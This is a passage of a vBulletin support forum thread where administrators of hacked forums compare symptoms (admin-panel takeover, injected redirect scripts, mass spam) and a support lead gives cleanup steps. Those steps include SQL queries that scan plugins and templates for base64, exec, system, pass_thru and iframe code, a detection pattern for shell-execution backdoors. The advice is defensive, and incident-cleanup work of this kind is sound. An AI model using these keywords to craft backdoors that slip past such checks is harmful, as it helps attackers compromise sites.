jforjustice.co.uk/banksters - Hacked

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Wayne Luke
    vBulletin Technical Support Lead
    • Aug 2000
    • 73976

    #31
    Originally posted by cobradude
    So, the first time I was hacked, they gained access to admincp, they inserted a plug in, as well as sent mail to my users. A holes! I locked down the ability to execute to a particular IP, changed all passwords, and they came back, but this time, they just hit the postparsed table and injected their bit of java to redirect every link.

    Any additional ideas on how to lock this down? I have vbseo and other plugins. This spans latest 4 and 3.8 boards I run.
    Make sure there are no remote access users on your database. Make sure none of your database users can access from wildcard % hosts.

    There is no way for them to simply "Hit the postparsed table" unless there is a plugin allowing them access to the database, phpmyadmin or similar is not secure on the server or there are remote access users.
    Translations provided by Google.

    Wayne Luke
    The Rabid Badger - a vBulletin Cloud demonstration site.
    vBulletin 5 API

    Comment

    • motoxer311
      Member
      • Nov 2008
      • 59
      • 3.7.x

      #32
      English please.. How do I fix ASAP without having to go through 4 years of computer science?

      Comment

      • cobradude
        Senior Member
        • Mar 2001
        • 147

        #33
        My phpmyadmin is secure to my IP, I don't see any new plugins....How do I validate that there are no remote access users? Thanks for the guidance/help.

        Comment

        • Wayne Luke
          vBulletin Technical Support Lead
          • Aug 2000
          • 73976

          #34
          Originally posted by motoxer311
          English please.. How do I fix ASAP without having to go through 4 years of computer science?
          This is all pretty basic website maintenance here and plain simple logic. If you can't follow the steps, you'll need to open a support ticket since you do have ticket support.

          Originally posted by cobradude
          My phpmyadmin is secure to my IP, I don't see any new plugins....How do I validate that there are no remote access users? Thanks for the guidance/help.
          You would need to check the MySQL users table in the mysql database. phpMyAdmin may show this if you're logging in as a root user. Otherwise ask your hosting provider or server administrator.
          Translations provided by Google.

          Wayne Luke
          The Rabid Badger - a vBulletin Cloud demonstration site.
          vBulletin 5 API

          Comment

          • motoxer311
            Member
            • Nov 2008
            • 59
            • 3.7.x

            #35
            Passwords have been changed for admin IDs.. Below is a list of plugins that I have installed.. Majority of them were disabled as of last week due to 18,000+ emails going out..

            Any plugins match those from other sites having issues?


            vBulletin 4.1.11
            AME 3 3.0.1 Auto Media Embedder and Video Extender
            BBR - Google Analytics Addon 1.0.3 Adds Google analytics code below the</head> tag.
            DragonByte Tech: vBShop (Lite) 1.2.1 vBShop is an advanced Shop system for vBulletin, designed to let your members spend accumulated points on various forum actions.
            DragonByte Tech: vBShout (Lite) 5.4.4 vBShout by DragonByte Technologies: Allow your forum members to chat with eachother in real-time with this AJAX-powered Shoutbox!
            Hasann - Sub-Forum Manager 4.0.1 Sub-Forum Manager by Hasann
            ibProArcade for vBulletin 2.7.0 ibProArcade - professional Arcade System for vBulletin
            Post Thank You Hack 7.82 Post Thank You Hack
            Skimlinks Plugin 4.1.11 Official Skimlinks plugin for vBulletin
            User CP Referral ID and Referrer in Profile 1.0.5 This product will add a content box at the top of the User CP displaying a customizable referral "Message" and the member's "Referral Link" along with their referral count. This will also show who referred a user in their profile in the About Me tab.
            vBadvanced CMPS 4.1.2 vBadvanced Content Management & Portal System
            vBH - Add new tabs 1.2 1.2 This plugin adds new tabs to the main navbar
            vBSEO 3.5.1 PL1 vBulletin SEO
            vBSkinZone - Simple Ad Management 1.0 Enables the inclusion of ads without editing templates
            vbStopForumSpam 0.61 This plugin allows you to check new registrations against www.StopForumSpam.com
            vBulletin Blog 4.1.11 Personal web log, integrated with vBulletin.
            vBulletin CMS 4.1.11 Content Management System
            VSa - Advanced Forum Statistics 7.0.3 VSa - Advanced Forum Statistics
            VSa - Login To User Account 3.0.5 VSa - Login To User Account
            VSa - PayPal Donate 5.0 VSa - PayPal Donate
            [APM] Advanced Product Management 4.0.001 Product Management Center: add/edit/delete product's components.

            Comment

            • crashtestdummy
              New Member
              • Feb 2006
              • 11
              • 3.6.x

              #36
              Originally posted by motoxer311
              Passwords have been changed for admin IDs.. Below is a list of plugins that I have installed.. Majority of them were disabled as of last week due to 18,000+ emails going out..

              Any plugins match those from other sites having issues?


              vBulletin 4.1.11
              AME 3 3.0.1 Auto Media Embedder and Video Extender
              BBR - Google Analytics Addon 1.0.3 Adds Google analytics code below the</head> tag.
              DragonByte Tech: vBShop (Lite) 1.2.1 vBShop is an advanced Shop system for vBulletin, designed to let your members spend accumulated points on various forum actions.
              DragonByte Tech: vBShout (Lite) 5.4.4 vBShout by DragonByte Technologies: Allow your forum members to chat with eachother in real-time with this AJAX-powered Shoutbox!
              Hasann - Sub-Forum Manager 4.0.1 Sub-Forum Manager by Hasann
              ibProArcade for vBulletin 2.7.0 ibProArcade - professional Arcade System for vBulletin
              Post Thank You Hack 7.82 Post Thank You Hack
              Skimlinks Plugin 4.1.11 Official Skimlinks plugin for vBulletin
              User CP Referral ID and Referrer in Profile 1.0.5 This product will add a content box at the top of the User CP displaying a customizable referral "Message" and the member's "Referral Link" along with their referral count. This will also show who referred a user in their profile in the About Me tab.
              vBadvanced CMPS 4.1.2 vBadvanced Content Management & Portal System
              vBH - Add new tabs 1.2 1.2 This plugin adds new tabs to the main navbar
              vBSEO 3.5.1 PL1 vBulletin SEO
              vBSkinZone - Simple Ad Management 1.0 Enables the inclusion of ads without editing templates
              vbStopForumSpam 0.61 This plugin allows you to check new registrations against www.StopForumSpam.com
              vBulletin Blog 4.1.11 Personal web log, integrated with vBulletin.
              vBulletin CMS 4.1.11 Content Management System
              VSa - Advanced Forum Statistics 7.0.3 VSa - Advanced Forum Statistics
              VSa - Login To User Account 3.0.5 VSa - Login To User Account
              VSa - PayPal Donate 5.0 VSa - PayPal Donate
              [APM] Advanced Product Management 4.0.001 Product Management Center: add/edit/delete product's components.
              vBadvanced CMPS, vBSEO, & Skimlinks

              I do believe the hackers installed Skimlinks on our system, since we didn't.
              tlzone.net
              ninja6zone.com
              rsvzone.com

              Comment

              • Danny M
                Member
                • May 2010
                • 58

                #37
                Originally posted by crashtestdummy
                vBadvanced CMPS, vBSEO, & Skimlinks

                I do believe the hackers installed Skimlinks on our system, since we didn't.
                The hackers also installed Skimlinks on my forum, because I certainly didn't install it.

                Comment

                • Wayne Luke
                  vBulletin Technical Support Lead
                  • Aug 2000
                  • 73976

                  #38
                  Originally posted by motoxer311
                  Passwords have been changed for admin IDs.. Below is a list of plugins that I have installed.. Majority of them were disabled as of last week due to 18,000+ emails going out..

                  Any plugins match those from other sites having issues?


                  vBulletin 4.1.11
                  AME 3 3.0.1 Auto Media Embedder and Video Extender
                  BBR - Google Analytics Addon 1.0.3 Adds Google analytics code below the</head> tag.
                  DragonByte Tech: vBShop (Lite) 1.2.1 vBShop is an advanced Shop system for vBulletin, designed to let your members spend accumulated points on various forum actions.
                  DragonByte Tech: vBShout (Lite) 5.4.4 vBShout by DragonByte Technologies: Allow your forum members to chat with eachother in real-time with this AJAX-powered Shoutbox!
                  Hasann - Sub-Forum Manager 4.0.1 Sub-Forum Manager by Hasann
                  ibProArcade for vBulletin 2.7.0 ibProArcade - professional Arcade System for vBulletin
                  Post Thank You Hack 7.82 Post Thank You Hack
                  Skimlinks Plugin 4.1.11 Official Skimlinks plugin for vBulletin
                  User CP Referral ID and Referrer in Profile 1.0.5 This product will add a content box at the top of the User CP displaying a customizable referral "Message" and the member's "Referral Link" along with their referral count. This will also show who referred a user in their profile in the About Me tab.
                  vBadvanced CMPS 4.1.2 vBadvanced Content Management & Portal System
                  vBH - Add new tabs 1.2 1.2 This plugin adds new tabs to the main navbar
                  vBSEO 3.5.1 PL1 vBulletin SEO
                  vBSkinZone - Simple Ad Management 1.0 Enables the inclusion of ads without editing templates
                  vbStopForumSpam 0.61 This plugin allows you to check new registrations against www.StopForumSpam.com
                  vBulletin Blog 4.1.11 Personal web log, integrated with vBulletin.
                  vBulletin CMS 4.1.11 Content Management System
                  VSa - Advanced Forum Statistics 7.0.3 VSa - Advanced Forum Statistics
                  VSa - Login To User Account 3.0.5 VSa - Login To User Account
                  VSa - PayPal Donate 5.0 VSa - PayPal Donate
                  [APM] Advanced Product Management 4.0.001 Product Management Center: add/edit/delete product's components.
                  vBShout just had an exploit found and patch released. You should be on version 6.0.4 by now.


                  You need to be on 3.6.0 of vBSEO to prevent exploits in it.

                  You should be on vBAdvanced 4.1.3 to solve an exploit in it.

                  iBProArcade was recently quarantined on vBulletin.org due to an exploit and an update released. You need to make sure you're up to date here.

                  I don't know about your other addons.
                  Translations provided by Google.

                  Wayne Luke
                  The Rabid Badger - a vBulletin Cloud demonstration site.
                  vBulletin 5 API

                  Comment

                  • Wayne Luke
                    vBulletin Technical Support Lead
                    • Aug 2000
                    • 73976

                    #39
                    Originally posted by Danny M
                    The hackers also installed Skimlinks on my forum, because I certainly didn't install it.
                    Skimlinks is a standard vBulletin Plugin and will be installed in all forums with version 4.1.2 or higher. Please read the release announcements people.
                    Translations provided by Google.

                    Wayne Luke
                    The Rabid Badger - a vBulletin Cloud demonstration site.
                    vBulletin 5 API

                    Comment

                    • BirdOPrey5
                      Senior Member
                      • Jul 2008
                      • 9613
                      • 5.6.3

                      #40
                      You better check all the mods. In product manager see if the product name is a link, it should take you to their thread on vb.org or their homepage where you can check for the latest versions.

                      Comment

                      • rootnik
                        Senior Member
                        • Nov 2001
                        • 110

                        #41
                        It is starting to look like VBSEO is the common product among us. I beginning to wonder if running vbseo is even worth it.

                        I also logged into phpmyadmin and found that every user had a wildcard setup as an acceptable host. I know I didn't set these up... I even had ANY user set to be able to connect from ANY host. So check out those mysql privileges, password protect your phpmyadmin directory.

                        Save yourself some headaches in the future by password protecting your admincp directory. At the very least they wouldn't have been able to send out the emails if this as done. On my forums they attempted to send the same email out to 150,000+ members over 100 times, all through the admincp. Luckily I had JUST signed up for Amazon SES and my account was limited to 10,000 emails a day.

                        Also, I was able to login to my admincp because I am a member of the administrator usergroup only as an additional user group. My admins who where set as a user of the Administrator usergroup by default, we had to change their passwords for them before they could login.

                        Comment

                        • Chad
                          Senior Member
                          • Oct 2004
                          • 589
                          • 3.7.x

                          #42
                          Originally posted by rootnik
                          It is starting to look like VBSEO is the common product among us. I beginning to wonder if running vbseo is even worth it.

                          I also logged into phpmyadmin and found that every user had a wildcard setup as an acceptable host. I know I didn't set these up... I even had ANY user set to be able to connect from ANY host. So check out those mysql privileges, password protect your phpmyadmin directory.
                          Please explain what you mean by the wildcard setup for "every user". I just want to make sure I'm understanding you right.

                          Anone else trace the problem to VBSEO? I did not have any "skim" plugin/product installed on my end but this is the 3rd time past 2 weeks this has happened.

                          Here is a strange note: the redirect does not happen to all forum categories, but only some. Further, if I turn off my forum (I'm still logged in as admin), the redirect disappears. Any idea about that?

                          This also happened yesterday and this is what I've done so far yesterday:

                          - changed database user/pw
                          - password protect admin directory (2 weeks ago), renamed admin directory (was already custom named)
                          - change my admin password
                          - change account password via cpanel
                          - apply about a dozen mod security rules
                          - enabled other security enhancements on php/apache (2 weeks ago) furthermore
                          [ Evidence & Prophecies Fulfilled : click ]
                          .:. Unanswered Prayers? /read this\

                          Comment

                          • pgowder
                            Senior Member
                            • Mar 2001
                            • 832

                            #43
                            I just got hit. I had vBSEO installed but not turned on.

                            I've turn off plugins, but still can't get into the site?

                            Any ideas?
                            PowWows.com

                            Comment

                            • Wayne Luke
                              vBulletin Technical Support Lead
                              • Aug 2000
                              • 73976

                              #44
                              1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons. Or upload a new set of files.

                              2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.

                              3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

                              4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.

                              5) Check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

                              6) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

                              Query for step 4 and 5 -
                              SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode like '%pass_thru%' OR phpcode like '%iframe%';

                              7) Run this query: SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template like '%pass_thru%' OR template like '%iframe%';

                              It checks the templates for compromising code.

                              8) Check .htaccess to make sure there are no redirects there.
                              Translations provided by Google.

                              Wayne Luke
                              The Rabid Badger - a vBulletin Cloud demonstration site.
                              vBulletin 5 API

                              Comment

                              • rootnik
                                Senior Member
                                • Nov 2001
                                • 110

                                #45
                                Originally posted by Chad
                                Please explain what you mean by the wildcard setup for "every user". I just want to make sure I'm understanding you right.
                                In phpmyadmin, under privileges it shows a list of mysql users. When I setup a database user I choose to only let them connect via localhost. Somehow every database user has granted access to the database remotely, from any host.


                                Anone else trace the problem to VBSEO? I did not have any "skim" plugin/product installed on my end but this is the 3rd time past 2 weeks this has happened.

                                Here is a strange note: the redirect does not happen to all forum categories, but only some. Further, if I turn off my forum (I'm still logged in as admin), the redirect disappears. Any idea about that?

                                This also happened yesterday and this is what I've done so far yesterday:

                                - changed database user/pw
                                - password protect admin directory (2 weeks ago), renamed admin directory (was already custom named)
                                - change my admin password
                                - change account password via cpanel
                                - apply about a dozen mod security rules
                                - enabled other security enhancements on php/apache (2 weeks ago) furthermore
                                Last edited by rootnik; Sat 24 Mar '12, 7:35am.

                                Comment

                                widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                                Working...